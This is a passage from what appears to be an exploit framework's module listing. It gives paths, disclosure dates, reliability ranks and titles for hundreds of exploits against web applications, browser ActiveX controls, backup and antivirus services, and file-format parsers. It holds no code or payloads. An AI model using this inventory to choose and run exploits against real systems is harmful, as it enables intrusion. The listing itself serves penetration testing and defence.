   unix/webapp/mambo_cache_lite                                   2008-06-14       excellent  Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
   unix/webapp/mitel_awc_exec                                     2010-12-12       excellent  Mitel Audio and Web Conferencing Command Injection
   unix/webapp/mybb_backdoor                                      2011-10-06       excellent  myBB 1.6.4 Backdoor Arbitrary Command Execution
   unix/webapp/nagios3_statuswml_ping                             2009-06-22       excellent  Nagios3 statuswml.cgi Ping Command Execution
   unix/webapp/openview_connectednodes_exec                       2005-08-25       excellent  HP Openview connectedNodes.ovpl Remote Command Execution
   unix/webapp/openx_banner_edit                                  2009-11-24       excellent  OpenX banner-edit.php File Upload PHP Code Execution
   unix/webapp/oracle_vm_agent_utl                                2010-10-12       excellent  Oracle VM Server Virtual Server Agent Command Injection
   unix/webapp/oscommerce_filemanager                             2009-08-31       excellent  osCommerce 2.2 Arbitrary PHP Code Execution
   unix/webapp/pajax_remote_exec                                  2006-03-30       excellent  PAJAX Remote Command Execution
   unix/webapp/php_eval                                           2008-10-13       manual     Generic PHP Code Evaluation
   unix/webapp/php_include                                        2006-12-17       normal     PHP Remote File Include Generic Exploit
   unix/webapp/php_vbulletin_template                             2005-02-25       excellent  vBulletin misc.php Template Name Arbitrary Code Execution
   unix/webapp/php_wordpress_lastpost                             2005-08-09       excellent  WordPress cache_lastpostdate Arbitrary Code Execution
   unix/webapp/php_xmlrpc_eval                                    2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution
   unix/webapp/phpbb_highlight                                    2004-11-12       excellent  phpBB viewtopic.php Arbitrary Code Execution
   unix/webapp/phpmyadmin_config                                  2009-03-24       excellent  PhpMyAdmin Config File Code Injection
   unix/webapp/qtss_parse_xml_exec                                2003-02-24       excellent  QuickTime Streaming Server parse_xml.cgi Remote Execution
   unix/webapp/redmine_scm_exec                                   2010-12-19       excellent  Redmine SCM Repository Arbitrary Command Execution
   unix/webapp/sphpblog_file_upload                               2005-08-25       excellent  Simple PHP Blog <= 0.4.0 Remote Command Execution
   unix/webapp/squirrelmail_pgp_plugin                            2007-07-09       manual     SquirrelMail PGP Plugin command execution (SMTP)
   unix/webapp/tikiwiki_graph_formula_exec                        2007-10-10       excellent  TikiWiki tiki-graph_formula Remote PHP Code Execution
   unix/webapp/tikiwiki_jhot_exec                                 2006-09-02       excellent  TikiWiki jhot Remote Command Execution
   unix/webapp/trixbox_langchoice                                 2008-07-09       manual     Trixbox langChoice PHP Local File Inclusion
   unix/webapp/twiki_history                                      2005-09-14       excellent  TWiki History TWikiUsers rev Parameter Command Execution
   unix/webapp/twiki_search                                       2004-10-01       excellent  TWiki Search Function Arbitrary Command Execution
   windows/antivirus/ams_hndlrsvc                                 2010-07-26       excellent  Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution
   windows/antivirus/ams_xfr                                      2009-04-28       excellent  Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution
   windows/antivirus/symantec_iao                                 2009-04-28       good       Symantec Alert Management System Intel Alert Originator Service Buffer Overflow
   windows/antivirus/symantec_rtvscan                             2006-05-24       good       Symantec Remote Management Buffer Overflow
   windows/antivirus/trendmicro_serverprotect                     2007-02-20       good       Trend Micro ServerProtect 5.58 Buffer Overflow
   windows/antivirus/trendmicro_serverprotect_createbinding       2007-05-07       good       Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow
   windows/antivirus/trendmicro_serverprotect_earthagent          2007-05-07       good       Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow
   windows/arkeia/type77                                          2005-02-18       good       Arkeia Backup Client Type 77 Overflow (Win32)
   windows/backdoor/energizer_duo_payload                         2010-03-05       excellent  Energizer DUO Trojan Code Execution
   windows/backupexec/name_service                                2004-12-16       average    Veritas Backup Exec Name Service Overflow
   windows/backupexec/remote_agent                                2005-06-22       great      Veritas Backup Exec Windows Remote Agent Overflow
   windows/brightstor/ca_arcserve_342                             2008-10-09       average    Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
   windows/brightstor/discovery_tcp                               2005-02-14       average    CA BrightStor Discovery Service TCP Overflow
   windows/brightstor/discovery_udp                               2004-12-20       average    CA BrightStor Discovery Service Stack Buffer Overflow
   windows/brightstor/etrust_itm_alert                            2008-04-04       average    Computer Associates Alert Notification Buffer Overflow
   windows/brightstor/hsmserver                                   2007-09-27       great      CA BrightStor HSM Buffer Overflow
   windows/brightstor/lgserver                                    2007-01-31       average    CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
   windows/brightstor/lgserver_multi                              2007-06-06       average    CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow
   windows/brightstor/lgserver_rxrlogin                           2007-06-06       average    CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
   windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter  2007-06-06       average    CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow
   windows/brightstor/lgserver_rxsuselicenseini                   2007-06-06       average    CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow
   windows/brightstor/license_gcr                                 2005-03-02       average    CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow
   windows/brightstor/mediasrv_sunrpc                             2007-04-25       average    CA BrightStor ArcServe Media Service Stack Buffer Overflow
   windows/brightstor/message_engine                              2007-01-11       average    CA BrightStor ARCserve Message Engine Buffer Overflow
   windows/brightstor/message_engine_72                           2010-10-04       average    CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow
   windows/brightstor/message_engine_heap                         2006-10-05       average    CA BrightStor ARCserve Message Engine Heap Overflow
   windows/brightstor/sql_agent                                   2005-08-02       average    CA BrightStor Agent for Microsoft SQL Overflow
   windows/brightstor/tape_engine                                 2006-11-21       average    CA BrightStor ARCserve Tape Engine Buffer Overflow
   windows/brightstor/tape_engine_8A                              2010-10-04       average    CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow
   windows/brightstor/universal_agent                             2005-04-11       average    CA BrightStor Universal Agent Overflow
   windows/browser/adobe_cooltype_sing                            2010-09-07       great      Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
   windows/browser/adobe_flashplayer_avm                          2011-03-15       good       Adobe Flash Player AVM Bytecode Verification Vulnerability
   windows/browser/adobe_flashplayer_flash10o                     2011-04-11       normal     Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
   windows/browser/adobe_flashplayer_newfunction                  2010-06-04       normal     Adobe Flash Player "newfunction" Invalid Pointer Use
   windows/browser/adobe_flatedecode_predictor02                  2009-10-08       good       Adobe FlateDecode Stream Predictor 02 Integer Overflow
   windows/browser/adobe_geticon                                  2009-03-24       good       Adobe Collab.getIcon() Buffer Overflow
   windows/browser/adobe_jbig2decode                              2009-02-19       good       Adobe JBIG2Decode Memory Corruption Exploit
   windows/browser/adobe_media_newplayer                          2009-12-14       good       Adobe Doc.media.newPlayer Use After Free Vulnerability
   windows/browser/adobe_shockwave_rcsl_corruption                2010-10-21       normal     Adobe Shockwave rcsL Memory Corruption
   windows/browser/adobe_utilprintf                               2008-02-08       good       Adobe util.printf() Buffer Overflow
   windows/browser/aim_goaway                                     2004-08-09       great      AOL Instant Messenger goaway Overflow
   windows/browser/amaya_bdo                                      2009-01-28       normal     Amaya Browser v11.0 bdo tag overflow
   windows/browser/aol_ampx_convertfile                           2009-05-19       normal     AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow
   windows/browser/aol_icq_downloadagent                          2006-11-06       excellent  America Online ICQ ActiveX Control Arbitrary File Download and Execute
   windows/browser/apple_itunes_playlist                          2005-01-11       normal     Apple ITunes 4.7 Playlist Buffer Overflow
   windows/browser/apple_quicktime_marshaled_punk                 2010-08-30       great      Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
   windows/browser/apple_quicktime_rtsp                           2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
   windows/browser/apple_quicktime_smil_debug                     2010-08-12       good       Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow
   windows/browser/ask_shortformat                                2007-09-24       normal     Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
   windows/browser/athocgov_completeinstallation                  2008-02-15       normal     AtHocGov IWSAlerts ActiveX Control Buffer Overflow
   windows/browser/autodesk_idrop                                 2009-04-02       normal     Autodesk IDrop ActiveX Control Heap Memory Corruption
   windows/browser/aventail_epi_activex                           2010-08-19       normal     SonicWALL Aventail epi.dll AuthCredential Format String Exploit
   windows/browser/awingsoft_web3d_bof                            2009-07-10       average    AwingSoft Winds3D Player SceneURL Buffer Overflow
   windows/browser/awingsoft_winds3d_sceneurl                     2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
   windows/browser/baofeng_storm_onbeforevideodownload            2009-04-30       normal     BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
   windows/browser/barcode_ax49                                   2007-06-22       normal     RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow
   windows/browser/blackice_downloadimagefileurl                  2008-06-05       excellent  Black Ice Cover Page ActiveX Control Arbitrary File Download
   windows/browser/ca_brightstor_addcolumn                        2008-03-16       normal     CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
   windows/browser/chilkat_crypt_writefile                        2008-11-03       excellent  Chilkat Crypt ActiveX WriteFile Unsafe Method
   windows/browser/cisco_anyconnect_exec                          2011-06-01       excellent  Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
   windows/browser/citrix_gateway_actx                            2011-07-14       normal     Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability
   windows/browser/communicrypt_mail_activex                      2010-05-19       great      CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
   windows/browser/creative_software_cachefolder                  2008-05-28       normal     Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
   windows/browser/dxstudio_player_exec                           2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
   windows/browser/ea_checkrequirements                           2007-10-08       normal     Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow
   windows/browser/ebook_flipviewer_fviewerloading                2007-06-06       normal     FlipViewer FViewerLoading ActiveX Control Buffer Overflow
   windows/browser/enjoysapgui_comp_download                                       excellent  EnjoySAP SAP GUI ActiveX Control Arbitrary File Download
   windows/browser/enjoysapgui_preparetoposthtml                  2007-07-05       normal     EnjoySAP SAP GUI ActiveX Control Buffer Overflow
   windows/browser/facebook_extractiptc                           2008-01-31       normal     Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
   windows/browser/gom_openurl                                    2007-10-27       normal     GOM Player ActiveX Control Buffer Overflow
   windows/browser/greendam_url                                   2009-06-11       normal     Green Dam URL Processing Buffer Overflow
   windows/browser/hp_easy_printer_care_xmlsimpleaccessor         2011-08-16       great      HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution
   windows/browser/hp_loadrunner_addfile                          2008-01-25       normal     Persits XUpload ActiveX AddFile Buffer Overflow
   windows/browser/hp_loadrunner_addfolder                        2007-12-25       good       HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
   windows/browser/hpmqc_progcolor                                2007-04-04       normal     HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow
   windows/browser/hyleos_chemviewx_activex                       2010-02-10       good       Hyleos ChemView ActiveX Control Stack Buffer Overflow
   windows/browser/ibmegath_getxmlvalue                           2009-03-24       normal     IBM Access Support ActiveX Control Buffer Overflow
   windows/browser/ibmlotusdomino_dwa_uploadmodule                2007-12-20       normal     IBM Lotus Domino Web Access Upload Module Buffer Overflow
   windows/browser/ie_createobject                                2006-04-11       excellent  Internet Explorer COM CreateObject Code Execution
   windows/browser/ie_iscomponentinstalled                        2006-02-24       normal     Internet Explorer isComponentInstalled Overflow
   windows/browser/ie_unsafe_scripting                            2010-09-20       excellent  Internet Explorer Unsafe Scripting Misconfiguration
   windows/browser/imgeviewer_tifmergemultifiles                  2010-03-03       normal     Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
   windows/browser/java_basicservice_impl                         2010-10-12       excellent  Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit
   windows/browser/java_codebase_trust                            2011-02-15       excellent  Sun Java Applet2ClassLoader Remote Code Execution
   windows/browser/java_docbase_bof                               2010-10-12       great      Sun Java Runtime New Plugin docbase Buffer Overflow
   windows/browser/java_ws_arginject_altjvm                       2010-04-09       excellent  Sun Java Web Start Plugin Command Line Argument Injection
   windows/browser/juniper_sslvpn_ive_setupdll                    2006-04-26       normal     Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow
   windows/browser/kazaa_altnet_heap                              2007-10-03       normal     Kazaa Altnet Download Manager ActiveX Control Buffer Overflow
   windows/browser/logitechvideocall_start                        2007-05-31       normal     Logitech VideoCall ActiveX Control Buffer Overflow
   windows/browser/lpviewer_url                                   2008-10-06       normal     iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
   windows/browser/macrovision_downloadandexecute                 2007-10-31       normal     Macrovision InstallShield Update Service Buffer Overflow
   windows/browser/macrovision_unsafe                             2007-10-20       excellent  Macrovision InstallShield Update Service ActiveX Unsafe Method
   windows/browser/mcafee_mcsubmgr_vsprintf                       2006-08-01       normal     McAfee Subscription Manager Stack Buffer Overflow
   windows/browser/mcafeevisualtrace_tracetarget                  2007-07-07       normal     McAfee Visual Trace ActiveX Control Buffer Overflow
   windows/browser/mirc_irc_url                                   2003-10-13       normal     mIRC IRC URL Buffer Overflow
   windows/browser/mozilla_interleaved_write                      2010-10-25       normal     Mozilla Firefox Interleaving document.write and appendChild Exploit
   windows/browser/mozilla_mchannel                               2011-05-10       normal     Mozilla Firefox 3.6.16 mChannel use after free vulnerability
   windows/browser/mozilla_nstreerange                            2011-02-02       normal     Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability
   windows/browser/mozilla_reduceright                            2011-06-21       normal     Mozilla Firefox Array.reduceRight() Integer Overflow
   windows/browser/ms03_020_ie_objecttype                         2003-06-04       normal     MS03-020 Internet Explorer Object Type
   windows/browser/ms05_054_onload                                2005-11-21       normal     Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability
   windows/browser/ms06_001_wmf_setabortproc                      2005-12-27       great      Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
   windows/browser/ms06_013_createtextrange                       2006-03-19       normal     Internet Explorer createTextRange() Code Execution
   windows/browser/ms06_055_vml_method                            2006-09-19       normal     Internet Explorer VML Fill Method Code Execution
   windows/browser/ms06_057_webview_setslice                      2006-07-17       normal     Internet Explorer WebViewFolderIcon setSlice() Overflow
   windows/browser/ms06_067_keyframe                              2006-11-14       normal     Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
   windows/browser/ms06_071_xml_core                              2006-10-10       normal     Internet Explorer XML Core Services HTTP Request Handling
   windows/browser/ms07_017_ani_loadimage_chunksize               2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
   windows/browser/ms08_041_snapshotviewer                        2008-07-07       excellent  Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
   windows/browser/ms08_053_mediaencoder                          2008-09-09       normal     Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
   windows/browser/ms08_070_visual_studio_msmask                  2008-08-13       normal     Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow
   windows/browser/ms08_078_xml_corruption                        2008-12-07       normal     Internet Explorer Data Binding Memory Corruption
   windows/browser/ms09_002_memory_corruption                     2009-02-10       normal     Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
   windows/browser/ms09_043_owc_htmlurl                           2009-08-11       normal     Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
   windows/browser/ms09_043_owc_msdso                             2009-07-13       normal     Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
   windows/browser/ms09_072_style_object                          2009-11-20       normal     Internet Explorer Style getElementsByTagName Memory Corruption
   windows/browser/ms10_002_aurora                                2010-01-14       normal     Internet Explorer "Aurora" Memory Corruption
   windows/browser/ms10_018_ie_behaviors                          2010-03-09       good       Internet Explorer DHTML Behaviors Use After Free
   windows/browser/ms10_018_ie_tabular_activex                    2010-03-09       good       Internet Explorer Tabular Data Control ActiveX Memory Corruption
   windows/browser/ms10_022_ie_vbscript_winhlp32                  2010-02-26       great      Internet Explorer Winhlp32.exe MsgBox Code Execution
   windows/browser/ms10_026_avi_nsamplespersec                    2010-04-13       normal     MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow
   windows/browser/ms10_042_helpctr_xss_cmd_exec                  2010-06-09       excellent  Microsoft Help Center XSS and Command Execution
   windows/browser/ms10_046_shortcut_icon_dllloader               2010-07-16       excellent  Microsoft Windows Shell LNK Code Execution
   windows/browser/ms10_090_ie_css_clip                           2010-11-03       good       Internet Explorer CSS SetUserClip Memory Corruption
   windows/browser/ms11_003_ie_css_import                         2010-11-29       good       Internet Explorer CSS Recursive Import Use After Free
   windows/browser/ms11_050_mshtml_cobjectelement                 2011-06-16       normal     MS11-050 IE mshtml!CObjectElement Use After Free
   windows/browser/msvidctl_mpeg2                                 2009-07-05       normal     Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
   windows/browser/mswhale_checkforupdates                        2009-04-15       normal     Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow
   windows/browser/nctaudiofile2_setformatlikesample              2007-01-24       normal     NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
   windows/browser/nis2004_antispam                               2004-03-19       normal     Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow
   windows/browser/nis2004_get                                    2007-05-16       normal     Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow
   windows/browser/novelliprint_callbackurl                       2010-08-20       normal     Novell iPrint Client ActiveX Control call-back-url Buffer Overflow
   windows/browser/novelliprint_datetime                          2009-12-08       great      Novell iPrint Client ActiveX Control Date/Time Buffer Overflow
   windows/browser/novelliprint_executerequest                    2008-02-22       normal     Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow
   windows/browser/novelliprint_executerequest_dbg                2010-08-04       normal     Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow
   windows/browser/novelliprint_getdriversettings                 2008-06-16       normal     Novell iPrint Client ActiveX Control Buffer Overflow
   windows/browser/novelliprint_getdriversettings_2               2010-11-15       normal     Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow
   windows/browser/novelliprint_target_frame                      2009-12-08       great      Novell iPrint Client ActiveX Control target-frame Buffer Overflow
   windows/browser/oracle_dc_submittoexpress                      2009-08-28       normal     Oracle Document Capture 10g ActiveX Control Buffer Overflow
   windows/browser/orbit_connecting                               2009-02-03       normal     Orbit Downloader Connecting Log Creation Buffer Overflow
   windows/browser/pcvue_func                                     2011-10-05       average    PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability
   windows/browser/persits_xupload_traversal                      2009-09-29       excellent  Persits XUpload ActiveX MakeHttpRequest Directory Traversal
   windows/browser/real_arcade_installerdlg                       2011-04-03       normal     Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution
   windows/browser/realplayer_cdda_uri                            2010-11-15       normal     RealNetworks RealPlayer CDDA URI Initialization Vulnerability
   windows/browser/realplayer_console                             2008-03-08       normal     RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
   windows/browser/realplayer_import                              2007-10-18       normal     RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow
   windows/browser/realplayer_qcp                                 2011-08-16       average    RealNetworks Realplayer QCP Parsing Heap Overflow
   windows/browser/realplayer_smil                                2005-03-01       normal     RealNetworks RealPlayer SMIL Buffer Overflow
   windows/browser/roxio_cineplayer                               2007-04-11       normal     Roxio CinePlayer ActiveX Control Buffer Overflow
   windows/browser/safari_xslt_output                             2011-07-20       excellent  Apple Safari Webkit libxslt Arbitrary File Creation
   windows/browser/sapgui_saveviewtosessionfile                   2009-03-31       normal     SAP AG SAPgui EAI WebViewer3D Buffer Overflow
   windows/browser/softartisans_getdrivename                      2008-08-25       normal     SoftArtisans XFile FileManager ActiveX Control Buffer Overflow
   windows/browser/sonicwall_addrouteentry                        2007-11-01       normal     SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
   windows/browser/symantec_altirisdeployment_downloadandinstall  2009-09-09       excellent  Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute
   windows/browser/symantec_altirisdeployment_runcmd              2009-11-04       normal     Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow
   windows/browser/symantec_appstream_unsafe                      2009-01-15       excellent  Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute
   windows/browser/symantec_backupexec_pvcalendar                 2008-02-28       normal     Symantec BackupExec Calendar Control Buffer Overflow
   windows/browser/symantec_consoleutilities_browseandsavefile    2009-11-02       normal     Symantec ConsoleUtilities ActiveX Control Buffer Overflow
   windows/browser/systemrequirementslab_unsafe                   2008-10-16       excellent  Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method
   windows/browser/teechart_pro                                   2011-08-11       normal     TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference
   windows/browser/trendmicro_extsetowner                         2010-08-25       normal     Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution
   windows/browser/trendmicro_officescan                          2007-02-12       normal     Trend Micro OfficeScan Client ActiveX Control Buffer Overflow
   windows/browser/tumbleweed_filetransfer                        2008-04-07       great      Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
   windows/browser/ultraoffice_httpupload                         2008-08-27       good       Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow
   windows/browser/verypdf_pdfview                                2008-06-16       normal     VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow
   windows/browser/viscom_movieplayer_drawtext                    2010-01-12       normal     Viscom Software Movie Player Pro SDK ActiveX 6.8
   windows/browser/vlc_amv                                        2011-03-23       good       VLC AMV Dangling Pointer Vulnerability
   windows/browser/webdav_dll_hijacker                            2010-08-18       manual     WebDAV Application DLL Hijacker
   windows/browser/webex_ucf_newobject                            2008-08-06       good       WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
   windows/browser/winamp_playlist_unc                            2006-01-29       great      Winamp Playlist UNC Path Computer Name Overflow
   windows/browser/winamp_ultravox                                2008-01-18       normal     Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow
   windows/browser/windvd7_applicationtype                        2007-03-20       normal     WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow
   windows/browser/winzip_fileview                                2007-11-02       normal     WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
   windows/browser/wmi_admintools                                 2010-12-21       great      Microsoft WMI Administration Tools ActiveX Buffer Overflow
   windows/browser/xmplay_asx                                     2006-11-21       good       XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
   windows/browser/yahoomessenger_fvcom                           2007-08-30       normal     Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
   windows/browser/yahoomessenger_server                          2007-06-05       good       Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow
   windows/browser/zenturiprogramchecker_unsafe                   2007-05-29       excellent  Zenturi ProgramChecker ActiveX Control Arbitrary File Download
   windows/dcerpc/ms03_026_dcom                                   2003-07-16       great      Microsoft RPC DCOM Interface Overflow
   windows/dcerpc/ms05_017_msmq                                   2005-04-12       good       Microsoft Message Queueing Service Path Overflow
   windows/dcerpc/ms07_029_msdns_zonename                         2007-04-12       great      Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
   windows/dcerpc/ms07_065_msmq                                   2007-12-11       good       Microsoft Message Queueing Service DNS Name Path Overflow
   windows/driver/broadcom_wifi_ssid                              2006-11-11       low        Broadcom Wireless Driver Probe Response SSID Overflow
   windows/driver/dlink_wifi_rates                                2006-11-13       low        D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
   windows/driver/netgear_wg111_beacon                            2006-11-16       low        NetGear WG111v2 Wireless Driver Long Beacon Overflow
   windows/email/ms07_017_ani_loadimage_chunksize                 2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
   windows/email/ms10_045_outlook_ref_only                        2010-06-01       excellent  Outlook ATTACH_BY_REF_ONLY File Execution
   windows/email/ms10_045_outlook_ref_resolve                     2010-06-01       excellent  Outlook ATTACH_BY_REF_RESOLVE File Execution
   windows/emc/alphastor_agent                                    2008-05-27       great      EMC AlphaStor Agent Buffer Overflow
   windows/fileformat/a-pdf_wav_to_mp3                            2010-08-17       normal     A-PDF WAV to MP3 v1.0.0 Buffer Overflow
   windows/fileformat/acdsee_fotoslate_string                     2011-09-12       good       ACDSee FotoSlate PLP File id Parameter Overflow
   windows/fileformat/acdsee_xpm                                  2007-11-23       good       ACDSee XPM File Section Buffer Overflow
   windows/fileformat/activepdf_webgrabber                        2008-08-26       low        activePDF WebGrabber ActiveX Control Buffer Overflow
   windows/fileformat/adobe_collectemailinfo                      2008-02-08       good       Adobe Collab.collectEmailInfo() Buffer Overflow
   windows/fileformat/adobe_cooltype_sing                         2010-09-07       great      Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
   windows/fileformat/adobe_flashplayer_button                    2010-10-28       normal     Adobe Flash Player "Button" Remote Code Execution
   windows/fileformat/adobe_flashplayer_newfunction               2010-06-04       normal     Adobe Flash Player "newfunction" Invalid Pointer Use
   windows/fileformat/adobe_flatedecode_predictor02               2009-10-08       good       Adobe FlateDecode Stream Predictor 02 Integer Overflow
   windows/fileformat/adobe_geticon                               2009-03-24       good       Adobe Collab.getIcon() Buffer Overflow
   windows/fileformat/adobe_illustrator_v14_eps                   2009-12-03       great      Adobe Illustrator CS4 v14.0.0
   windows/fileformat/adobe_jbig2decode                           2009-02-19       good       Adobe JBIG2Decode Memory Corruption Exploit
   windows/fileformat/adobe_libtiff                               2010-02-16       good       Adobe Acrobat Bundled LibTIFF Integer Overflow
   windows/fileformat/adobe_media_newplayer                       2009-12-14       good       Adobe Doc.media.newPlayer Use After Free Vulnerability
   windows/fileformat/adobe_pdf_embedded_exe                      2010-03-29       excellent  Adobe PDF Embedded EXE Social Engineering
   windows/fileformat/adobe_pdf_embedded_exe_nojs                 2010-03-29       excellent  Adobe PDF Escape EXE Social Engineering (No JavaScript)
   windows/fileformat/adobe_reader_u3d                            2011-12-06       average    Adobe Reader U3D Memory Corruption Vulnerability
   windows/fileformat/adobe_u3d_meshdecl                          2009-10-13       good       Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
   windows/fileformat/adobe_utilprintf                            2008-02-08       good       Adobe util.printf() Buffer Overflow
   windows/fileformat/altap_salamander_pdb                        2007-06-19       good       Altap Salamander 2.5 PE Viewer Buffer Overflow
   windows/fileformat/aol_desktop_linktag                         2011-01-31       normal     AOL Desktop 9.6 RTX Buffer Overflow
   windows/fileformat/aol_phobos_bof                              2010-01-20       average    AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow
   windows/fileformat/apple_quicktime_pnsize                      2011-08-08       good       Apple QuickTime PICT PnSize Buffer Overflow
   windows/fileformat/audio_wkstn_pls                             2009-12-08       good       Audio Workstation 6.4.2.4.3 pls Buffer Overflow
   windows/fileformat/audiotran_pls                               2010-01-09       good       Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
   windows/fileformat/aviosoft_plf_buf                            2011-11-09       good       Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow
   windows/fileformat/bacnet_csv                                  2010-09-16       good       BACnet OPC Client Buffer Overflow
   windows/fileformat/blazedvd_plf                                2009-08-03       good       BlazeDVD 5.1 PLF Buffer Overflow
   windows/fileformat/ca_cab                                      2007-06-05       good       CA Antivirus Engine CAB Buffer Overflow
   windows/fileformat/cain_abel_4918_rdp                          2008-11-30       good       Cain & Abel <= v4.9.24 RDP Buffer Overflow
   windows/fileformat/ccmplayer_m3u_bof                           2011-11-30       good       CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)
   windows/fileformat/cytel_studio_cy3                            2011-10-02       good       Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow
   windows/fileformat/deepburner_path                             2006-12-19       great      AstonSoft DeepBurner (DBR File) Path Buffer Overflow
   windows/fileformat/destinymediaplayer16                        2009-01-03       good       Destiny Media Player 1.61 PLS M3U Buffer Overflow
   windows/fileformat/digital_music_pad_pls                       2010-09-17       normal     Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow
   windows/fileformat/djvu_imageurl                               2008-10-30       low        DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
   windows/fileformat/dvdx_plf_bof                                2007-06-02       normal     DVD X Player 5.5 .plf PlayList Buffer Overflow
   windows/fileformat/emc_appextender_keyworks                    2009-09-29       average    EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow
   windows/fileformat/esignal_styletemplate_bof                   2011-09-06       normal     eSignal and eSignal Pro <= 10.6.2425.1208 file parsing buffer overflow in QUO
   windows/fileformat/etrust_pestscan                             2009-11-02       average    CA eTrust PestPatrol ActiveX Control Buffer Overflow
   windows/fileformat/ezip_wizard_bof                             2009-03-09       good       eZip Wizard 3.0 Stack Buffer Overflow
   windows/fileformat/fatplayer_wav                               2010-10-18       normal     Fat Player Media Player 0.6b0 Buffer Overflow
